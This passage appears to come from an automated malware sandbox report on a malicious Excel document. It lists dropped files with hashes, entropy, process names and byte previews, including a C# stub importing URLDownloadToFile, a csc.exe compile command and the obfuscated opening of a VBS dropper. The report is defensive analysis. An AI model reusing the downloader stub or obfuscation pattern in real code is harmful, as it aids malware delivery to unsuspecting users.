                                                                                            Preview:L...b.Wg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\izhw321o\CSCDC8260CFBF8C4877B302B76AFCC254F.TMP..................cx[.....f./.{j..........4.......C:\Users\user\AppData\Local\Temp\RES476D.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.z.h.w.3.2.1.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                            C:\Users\user\AppData\Local\Temp\RESA5F0.tmp

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Dec 10 05:58:20 2024, 1st section name ".debug$S"
                                                                                            Category:dropped
                                                                                            Size (bytes):1328
                                                                                            Entropy (8bit):4.012538177294539
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Hee9EuriqQ21dHxwKdNWI+ycuZhNHakSpPNnqSqd:LriqQg6Kd41ulHa3LqSK
                                                                                            MD5:AD01DC4BE073F83E1292A1149032E011
                                                                                            SHA1:D81B6A804B171F0B335DF1511436282735FA9937
                                                                                            SHA-256:ED116126F06A6BAC44D9BC2C03A10010FE1BF1684003955C4AFA67EA517D98D8
                                                                                            SHA-512:572F4B116AF2944152C7976265D2ABC7F1E88634ED5C3D1098AF5487862ED0CA2B87777CBA8B7653E285C1AE0A537EA01848AA80CDEE1A3BA11E4CD8242A433B
                                                                                            Malicious:false
                                                                                            Preview:L...|.Wg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\24vqjdjh\CSCC170874EB5994B058785371DF20B8BA.TMP................O.68...-[.U..o............4.......C:\Users\user\AppData\Local\Temp\RESA5F0.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.4.v.q.j.d.j.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                            C:\Users\user\AppData\Local\Temp\csdhpuz4.egi.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1

                                                                                            C:\Users\user\AppData\Local\Temp\ehe2z4c1.41a.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1

                                                                                            C:\Users\user\AppData\Local\Temp\izhw321o\CSCDC8260CFBF8C4877B302B76AFCC254F.TMP

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:MSVC .res
                                                                                            Category:dropped
                                                                                            Size (bytes):652
                                                                                            Entropy (8bit):3.121947616939961
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0Gak7Ynqq/XPN5Dlq5J:+RI+ycuZhNxakS/PNnqX
                                                                                            MD5:BB8363785B8D1B9EFBBB669B2FCC7B6A
                                                                                            SHA1:ED7A05C87C696E7BE9455CC620A7259AAC455594
                                                                                            SHA-256:38C8A69F9DA7F8C5AF0FCCEF508265125D5B41DFA0D1B545EEF7767E0F9D4830
                                                                                            SHA-512:33013BDCCFDCC08CDE23CB6E2ECC823451AFB33672CF27AA44AC97EF68F0AD3B785C4B7CF0BBB8DAEE57708E3E9FF4E7D796D7D77E3E03ACBB6DC925B1C88537
                                                                                            Malicious:false
                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.z.h.w.3.2.1.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.z.h.w.3.2.1.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                            C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.0.cs

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (369)
                                                                                            Category:dropped
                                                                                            Size (bytes):482
                                                                                            Entropy (8bit):3.72494092078817
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:V/DsYLDS81zusXXemMGtpjQXReKJ8SRHy4HHlkbZ/vNy:V/DTLDfurbXfHO3Ny
                                                                                            MD5:8C16810A9A149EE7B288951C6AFDFCD1
                                                                                            SHA1:4322374E8321E8A97AB6AF0B6A23BB3F016C9713
                                                                                            SHA-256:95C610A9E86321D9DEA63594D0D9C9CB72C5DC56EDF8F78F25736A76CAC0D949
                                                                                            SHA-512:0E37863619591FDD2CDE0AE8EAD71EF856695E299E9BB76266F1B40588D3F7E26521F7CB0BEDCFA2A0809224DC02B076D4A07A1D247B23ADB30E79CA5F626564
                                                                                            Malicious:false
                                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace LUtJBV.{. public class gNw. {. [DllImport("urlMOn.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr leaFQHyg,string Txt,string lMM,uint eMnvlHQop,IntPtr kfbeumR);.. }..}.

                                                                                            C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):369
                                                                                            Entropy (8bit):5.295153068893179
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fGwVH0zxs7+AEszIP23fGwdBH:p37Lvkmb6KzWWZEozH
                                                                                            MD5:CE57452914714FE7C76825C68DD2B377
                                                                                            SHA1:AAFE4AF00DA27D54DD4E386F85E90CD178D06441
                                                                                            SHA-256:E80C693E52BD9B4B0B2D64C05B6F25A1455FDF27EDB9524A03149AC869FAB607
                                                                                            SHA-512:601D8F46B67E2813AB1C7CD1304AE5FB420A476D172EFCA236276C3F2B4E05C164A00BD96122CD74688CDC2684D530E32D8F29A4BAB63FCB2D36278F8960F6AB
                                                                                            Malicious:true
                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.0.cs"

                                                                                            C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.dll

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):3072
                                                                                            Entropy (8bit):2.823926434739326
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:etGSaPBG5eM7p8y7MfukhCa0vnk1b+PtkZfGfm2sqhkWI+ycuZhNxakS/PNnq:65sM+lfFCvkt+uJem2sEH1ulxa3dq
                                                                                            MD5:953ACA400D9D54282F064E73D538C25A
                                                                                            SHA1:274EDDAACCF3C75CBE1FC9F45630182D73493F45
                                                                                            SHA-256:A4BCA56A70DBA80AF51F2F2AA074B6FC0646FDC87714BB8E63B302F13889FDF9
                                                                                            SHA-512:EA0AA267B22E0FE921BE02B66431DEB6B7298020243B0806DAF2B0D0306482AE8A337409A0711C16E039BEBE0A82D13E81EDA2C7E75FB81E3692F2131E8D2581
                                                                                            Malicious:false
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.Wg...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................2.+.....t.....t.......................................... 9.....P ......K.........Q.....Z.....^.....b.....l...K.....K...!.K.....K.......!.....*.......9......................................."..........<Module>.iz

                                                                                            C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.out

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):866
                                                                                            Entropy (8bit):5.34840940228634
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:AId3ka6KznEoqKaMD5DqBVKVrdFAMBJTH:Akka60nEoqKdDcVKdBJj
                                                                                            MD5:2FE5DE7558C228A1D2C6D30048326E51
                                                                                            SHA1:B7FC3DE9DB911FD23C9C5A01FF863B786E05AB5B
                                                                                            SHA-256:C6B43AD6A02CEDEAC8291CF7A0D20F5A0484F48EDF551168B4FA10D181D62204
                                                                                            SHA-512:0DAD2844820653E8DA95A8CFC5F9BF6D01D4FF12C8B8578857B290166C0BB12310EF4D79DDDFF7F4CC9834BFBEFD235CBEC0ADA93C0F09D6B0FA51FF294B86ED
                                                                                            Malicious:false
                                                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                            C:\Users\user\AppData\Local\Temp\oi4qj432.dfo.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1

                                                                                            C:\Users\user\AppData\Local\Temp\qsa1s4cg.vhb.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1

                                                                                            C:\Users\user\AppData\Local\Temp\rhe031u4.ugi.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1

                                                                                            C:\Users\user\AppData\Local\Temp\sya1hyza.4sc.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1

                                                                                            C:\Users\user\AppData\Local\Temp\uawzvmz3.tuc.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1

                                                                                            C:\Users\user\AppData\Local\Temp\xpp4yexj.dvl.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1

                                                                                            C:\Users\user\AppData\Local\Temp\~DF059C18C3F05133FB.TMP

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):53248
                                                                                            Entropy (8bit):5.665705943306328
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:BbIdJrxBERqy4PnnjkUqXelNChvpiByN/6KuUuL:BkJrxiqtvn2XuURvEKuUuL
                                                                                            MD5:6BE7E873848441C0A732BD8ADF59CAC6
                                                                                            SHA1:1AB670584DBDCF873DC62FE68232BACF7E35C3C2
                                                                                            SHA-256:1D9413277F9DB7DC64BAD66A4D40ED68CC96D959DE229261B12B46D6BFC025D8
                                                                                            SHA-512:24A8CEC61E6D5DE2FAECF7075C701AA530D02723DEDDDB0FAAD3A0690BADF280CA20CD86DF8593674969F74C31F5BC7F5FBBA84A81D516CEB90A5730C562E282
                                                                                            Malicious:false
                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\~DF6A2258411DDF3934.TMP

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):512
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3::
                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                            Malicious:false
                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\~DFC5775B17DEE69542.TMP

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):512
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3::
                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                            Malicious:false
                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):10240
                                                                                            Entropy (8bit):0.6739662216458647
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
                                                                                            MD5:C61F99FE7BEE945FC31B62121BE075CD
                                                                                            SHA1:083BBD0568633FECB8984002EB4FE8FA08E17DD9
                                                                                            SHA-256:1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
                                                                                            SHA-512:46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
                                                                                            Malicious:false
                                                                                            Preview: ....+..F..N..F).~]............\.">.. .......p.J..} /o...rLj-...FS..'x.o..%^ .....zr/..3.y.e4...MM.4..x9.f.D..{..(....'p......9...Qn..d..+.....H..M.)..........].....n-.]........n&.*.H`.sz...r.....1B.....e.."...A.....,-....n..$.<....CO..VO..P..'.......<......n....&5s....z..$.{'IM-.o..(#N.-..(H...a&...y.S..`8.(./...1.P.. .....K.3.......I!]G....@N........F.l.T=.0...`"..L....B...B`nI.<.....&F..2J2....1..Rs....h.Zq.`...t..CJ....@.....I.G.e..k..H.....F..G:..6.G.l=.Y......:...C.........?[.ts...=....;.|...q...@....s................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):24152
                                                                                            Entropy (8bit):0.7532185028349225
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:CMnfnO4FGtsFqN6t8nlztZKR6axR6uiozVb:ZnfO4kWKpZKdxR35
                                                                                            MD5:520FE964934AF1AB0CEBA2366830D0FA
                                                                                            SHA1:B90310ACA870261CB619FDFD1E54E1B1A25074FF
                                                                                            SHA-256:DBD45EEA386D364B30BA189E079BFA05C2C40D9E5E83722C39A171998ED079C1
                                                                                            SHA-512:A4839A6AB8DB522D9121A590B8C711E8C4F172D9CB71C918860F8048472920F3341B7BA624DFF514BE397809149E4471B2DF981DC81FE77C26B2DDF342A42F8C
                                                                                            Malicious:false
                                                                                            Preview: ...W....K.h.E..g..0...!1sm.[t\......A......5_...N{Yf?.w..[.Y..A...a^..(._.=.......:.v.$*.....e...F....f.qo.]...B1{.8.%%..,...;.|..<....g ....l.7.`ny.h.n.y...~Y.../.. .WZ.'......AI.|.._K}-$.i..<(.7Y...U....T.i.N.'Pt..c.[........<zni.::. 8W.<S...8!.Wh..;T.?.^yf...E?...pQ....i.;>/..^...r.YsncP..@.. .[".^..A.|.0..$<bC.G........~];..D.|.v.B.).g.E5.?... .N...}....i.,5..a.Fk.%.u.`..F...;xlw.}.5.Jt..c.5.....v...~)..8b|.*.B.]-]jk....PQZ..T}..M.S...88......?.*$..]..%V..D.<.5.d...[..Z.....2........%.$E..+sb.......*...g...>Q[l.}......@=..5L..._....Pi..HY.<[..l...H....9.\=u.v.....S8-&...,5..}t......m...*..R.W.G.NZ....w.....{.iA......G.f.TN.zk..(....q).....n....3..C...d./..........................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (3203), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):153952
                                                                                            Entropy (8bit):3.8067197460998417
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:HJlofF4RJFAiJlofF4RJFNiJlofF4RJFl:HJlofeRJFAiJlofeRJFNiJlofeRJFl
                                                                                            MD5:5CE00A79A9F41D260446BFDCC6267ADF
                                                                                            SHA1:0B2B90BEB56C59916B98004B1444698538729822
                                                                                            SHA-256:EFAB5D21ED82F610BC5F1734B909A7E5C3A6C2ECEBB276DD03B4D5BAF8E9B058
                                                                                            SHA-512:D4DE7FE61F23CE7524ED3123319AC93F33AE1806BD426045CA9DF1FA9EE82CCA58AA314711BBDE6A6FFA2EEE98DC20CC5E4D80D2EC7ABB028BE0639944714FEE
                                                                                            Malicious:true
                                                                                            Preview:...... . . . .....P.t.u.O.q.o.f.e.c.d.G.k.H.L.t. .=. .".c.I.k.R.N.r.W.W.z.n.d.u.x.p.B.".....n.G.T.z.L.p.K.i.c.q.p.t.i.a.k. .=. .".G.U.K.e.W.L.p.u.e.j.c.q.l.e.K.".....e.L.e.j.L.A.W.U.k.G.B.G.W.b.L. .=. .".W.c.T.W.L.l.b.i.K.W.i.m.J.m.O.".........K.N.k.U.n.z.W.o.u.h.Q.K.C.o.W. .=. .".O.z.o.G.A.k.p.a.R.g.h.P.i.d.l.".....l.k.R.h.m.T.i.u.i.x.B.L.f.x.b. .=. .".P.L.n.G.e.k.q.a.I.n.W.f.i.L.a.".....N.c.t.U.W.s.C.b.B.L.l.m.L.J.H. .=. .".t.i.G.W.W.n.m.U.o.L.k.L.K.e.Q.".....W.i.I.K.l.n.i.K.l.j.p.A.k.G.Z. .=. .".G.i.N.k.o.B.U.x.L.c.s.W.b.L.Z.".....c.W.e.q.B.L.o.o.z.j.K.t.o.L.Q. .=. .".n.i.p.Z.i.W.j.K.L.z.m.G.W.A.v.".....W.B.o.q.i.Q.l.i.W.C.W.l.h.i.k. .=. .".O.A.G.W.K.m.Z.S.L.c.x.U.r.W.d.".....b.A.L.U.L.q.G.x.L.W.f.u.z.m.k. .=. .".l.b.m.c.W.G.A.O.Z.A.m.i.p.c.K.".....e.p.L.l.x.r.K.N.K.s.k.h.A.U.U. .=. .".L.c.K.i.K.i.i.z.J.N.a.o.C.b.S.".....l.k.L.h.a.P.O.n.K.h.u.j.f.k.h. .=. .".L.h.P.C.T.e.L.Z.m.n.k.G.u.Z.n.".....J.G.i.L.c.C.f.G.K.N.C.t.t.e.k. .=. .".W.i.i.W.z.W.b.k.B.P.b.o.G.a.c.".....P.m.L.W.f.S.k.S.

                                                                                            C:\Users\user\Desktop\54330000

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Dec 10 05:58:03 2024, Security: 1
                                                                                            Category:dropped
                                                                                            Size (bytes):1062912
                                                                                            Entropy (8bit):7.778659222828756
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:4tmzHJEUiOIBUzMTSvD3DERnLRmF8DmEPmxpsAQx1Zj+jJEPzcxyL+3hgLFM6xfU:pBambARM8FA8Z+jEd+RwFxf/XA+e
                                                                                            MD5:126A9BFB7B5465383C132D824FC2DA1D
                                                                                            SHA1:73BA715B840B6992917B3EB69BAB0B847FD5DC7C
                                                                                            SHA-256:5B0C550D298018EC9EF24FBE853FEA2D6354712BE5663D89EBD43A782E8F046C
                                                                                            SHA-512:DC68D854D7148035C4B934D6BF6665C83A27445A0CE3C3101B35ACF2E17FE70E211D20652BC066B72A070C58B3646AC3CFF1774D241AE952D0FDD9575DEDED3A
                                                                                            Malicious:false
